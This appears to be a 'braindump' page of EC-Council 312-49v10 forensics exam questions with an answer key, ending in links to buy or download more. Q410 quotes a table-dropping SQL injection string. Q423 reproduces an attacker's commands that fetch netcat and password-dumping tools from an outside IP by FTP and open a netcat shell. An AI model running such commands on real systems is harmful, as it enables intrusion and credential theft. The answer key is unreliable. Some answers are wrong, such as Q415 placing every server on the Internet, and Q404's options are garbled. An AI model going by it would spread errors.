Updated PDF (New 2023) Actual EC-COUNCIL 312-49v10 Exam Questions [Q402-Q425]

Share

Updated PDF (New 2023) Actual EC-COUNCIL 312-49v10 Exam Questions

Verified 312-49v10 Exam Dumps PDF [2023] Access using TorrentValid

NEW QUESTION # 402
Which of the following attack uses HTML tags like <script></script>?

  • A. XSS attack
  • B. Spam
  • C. SQL injection
  • D. Phishing

Answer: A


NEW QUESTION # 403
Which of the following options will help users to enable or disable the last access time on a system running Windows 10 OS?

  • A. wmic service
  • B. Devcon
  • C. Reg.exe
  • D. fsutil

Answer: D


NEW QUESTION # 404
What is the CIDR from the following screenshot?

  • A. /32 B./32 B./32
  • B. /16 C./16 C./16
  • C. /8D./8D./8
  • D. /24A./24A./24

Answer: C


NEW QUESTION # 405
A forensic examiner encounters a computer with a failed OS installation and the master boot record (MBR) or partition sector damaged. Which of the following tools can find and restore files and Information In the disk?

  • A. NetCat
  • B. Wireshark
  • C. R-Studio
  • D. Helix

Answer: D


NEW QUESTION # 406
When using an iPod and the host computer is running Windows, what file system will be used?

  • A. iPod+
  • B. HFS
  • C. FAT32
  • D. FAT16

Answer: C


NEW QUESTION # 407
Which of the following Linux command searches through the current processes and lists the process IDs those match the selection criteria to stdout?

  • A. pstree
  • B. pgrep
  • C. grep
  • D. ps

Answer: B


NEW QUESTION # 408
What document does the screenshot represent?

  • A. Evidence collection form
  • B. Chain of custody form
  • C. Expert witness form
  • D. Search warrant form

Answer: A


NEW QUESTION # 409
Which of the following network attacks refers to sending huge volumes of email to an address in an attempt to overflow the mailbox or overwhelm the server where the email address is hosted so as to cause a denial-of-service attack?

  • A. Email spamming
  • B. Mail bombing
  • C. Phishing
  • D. Email spoofing

Answer: B


NEW QUESTION # 410
What will the following command produce on a website login page? SELECT email, passwd, login_id, full_name FROM members WHERE email = '[email protected]'; DROP TABLE members; --'

  • A. Retrieves the password for the first user in the members table
  • B. Deletes the entire members table
  • C. This command will not produce anything since the syntax is incorrect
  • D. Inserts the Error! Reference source not found.email address into the members table

Answer: B


NEW QUESTION # 411
Which among the following search warrants allows the first responder to search and seize the victim's computer components such as hardware, software, storage devices, and documentation?

  • A. Citizen Informant Search Warrant
  • B. John Doe Search Warrant
  • C. Service Provider Search Warrant
  • D. Electronic Storage Device Search Warrant

Answer: D


NEW QUESTION # 412
In a computer that has Dropbox client installed, which of the following files related to the Dropbox client store information about local Dropbox installation and the Dropbox user account, along with email IDs linked with the account?

  • A. filecache.db
  • B. config.db
  • C. sigstore.db
  • D. install.db

Answer: B


NEW QUESTION # 413
Sectors are pie-shaped regions on a hard disk that store dat
a. Which of the following parts of a hard disk do not contribute in determining the addresses of data?

  • A. Heads
  • B. Cylinder
  • C. Sectors
  • D. Interface

Answer: D


NEW QUESTION # 414
Identify the location of Recycle Bin on a Windows 7 machine that uses NTFS file system to store and retrieve files on the hard disk.

  • A. DriveARECYCLED
  • B. Drive:\$Recycle.Bin
  • C. C:\RECYCLED
  • D. DriveARECYCLER

Answer: B


NEW QUESTION # 415
You need to deploy a new web-based software package for your organization. The package requires three separate servers and needs to be available on the Internet. What is the recommended architecture in terms of server placement?

  • A. A web server facing the Internet, an application server on the internal network, a database server on the internal network
  • B. A web server and the database server facing the Internet, an application server on the internal network
  • C. All three servers need to face the Internet so that they can communicate between themselves
  • D. All three servers need to be placed internally

Answer: C


NEW QUESTION # 416
Which of the following is a record of the characteristics of a file system, including its size, the block size, the empty and the filled blocks and their respective counts, the size and location of the inode tables, the disk block map and usage information, and the size of the block groups?

  • A. Superblock
  • B. Data block
  • C. Inode bitmap block
  • D. Block bitmap block

Answer: A


NEW QUESTION # 417
Which of the following methods of mobile device data acquisition captures all the data present on the device, as well as all deleted data and access to unallocated space?

  • A. Physical acquisition
  • B. Logical acquisition
  • C. Direct acquisition
  • D. Manual acquisition

Answer: A


NEW QUESTION # 418
You are working for a large clothing manufacturer as a computer forensics investigator and are called in to investigate an unusual case of an employee possibly stealing clothing designs from the company and selling them under a different brand name for a different company. What you discover during the course of the investigation is that the clothing designs are actually original products of the employee and the company has no policy against an employee selling his own designs on his own time. The only thing that you can find that the employee is doing wrong is that his clothing design incorporates the same graphic symbol as that of the company with only the wording in the graphic being different. What area of the law is the employee violating?

  • A. copyright law
  • B. trademark law
  • C. brandmark law
  • D. printright law

Answer: B


NEW QUESTION # 419
Travis, a computer forensics investigator, is finishing up a case he has been working on for over a month involving copyright infringement and embezzlement. His last task is to prepare an investigative report for the president of the company he has been working for. Travis must submit a hard copy and an electronic copy to this president. In what electronic format should Travis send this report?

  • A. DOC
  • B. TIFF-8
  • C. PDF
  • D. WPD

Answer: C


NEW QUESTION # 420
When analyzing logs, it is important that the clocks of all the network devices are synchronized. Which protocol will help in synchronizing these clocks?

  • A. Time Protocol
  • B. PTP
  • C. NTP
  • D. UTC

Answer: C


NEW QUESTION # 421
You are an information security analyst at a large pharmaceutical company. While performing a routine review of audit logs, you have noticed a significant amount of egress traffic to various IP addresses on destination port 22 during off-peak hours. You researched some of the IP addresses and found that many of them are in Eastern Europe. What is the most likely cause of this traffic?

  • A. Internal systems are downloading automatic Windows updates
  • B. Data is being exfiltrated by an advanced persistent threat (APT)
  • C. Malicious software on internal system is downloading research data from partner 5FTP servers in Eastern Europe
  • D. The organization's primary internal DNS server has been compromised and is performing DNS zone transfers to malicious external entities

Answer: B


NEW QUESTION # 422
Which of the following stages in a Linux boot process involve initialization of the system's hardware?

  • A. BIOS Stage
  • B. BootROM Stage
  • C. Kernel Stage
  • D. Bootloader Stage

Answer: A


NEW QUESTION # 423
The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.
He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below.
"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c echo johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo get pdump.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c echo quit >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"
What can you infer from the exploit given?

  • A. It is a local exploit where the attacker logs in using username johna2k
  • B. There are two attackers on the system - johna2k and haxedj00
  • C. The attack is a remote exploit and the hacker downloads three files
  • D. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port

Answer: C

Explanation:
The log clearly indicates that this is a remote exploit with three files being downloaded and hence the correct answer is C.


NEW QUESTION # 424
When using Windows acquisitions tools to acquire digital evidence, it is important to use a well-tested hardware write-blocking device to:

  • A. Avoiding copying data from the boot partition
  • B. Automate Collection from image files
  • C. Prevent Contamination to the evidence drive
  • D. Acquire data from host-protected area on a disk

Answer: C


NEW QUESTION # 425
......

Try Best 312-49v10 Exam Questions from Training Expert TorrentValid: https://www.torrentvalid.com/312-49v10-valid-braindumps-torrent.html

Practice Examples and Dumps & Tips for 2023 Latest 312-49v10 Valid Tests Dumps: https://drive.google.com/open?id=1Yvb-e6iAj2BydGFxAJuY25Uz0q-S5Etr